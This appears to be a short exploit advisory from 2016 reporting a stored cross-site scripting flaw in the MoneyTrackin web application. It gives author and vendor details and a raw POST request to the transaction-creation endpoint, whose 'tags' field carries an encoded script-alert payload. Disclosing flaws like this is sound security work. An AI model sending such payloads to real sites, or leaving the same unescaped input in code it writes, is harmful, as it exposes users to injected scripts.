MoneyTrackin Web Application suffers from a persistent cross site scripting vulnerability.
6402aae158ad1102885aef5e05fc5dcb6d5bd711801b982df72a5e5137bc6f0c
# Exploit Title: MoneyTrackin Web Application - Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://www.moneytrackin.com/
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Request
Request
POST /accounting/create_transaction/?project=NULL HTTP/1.1
Host: www.moneytrackin.com
project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sent=1&clientDate=2016-06-17&oldproject=NULL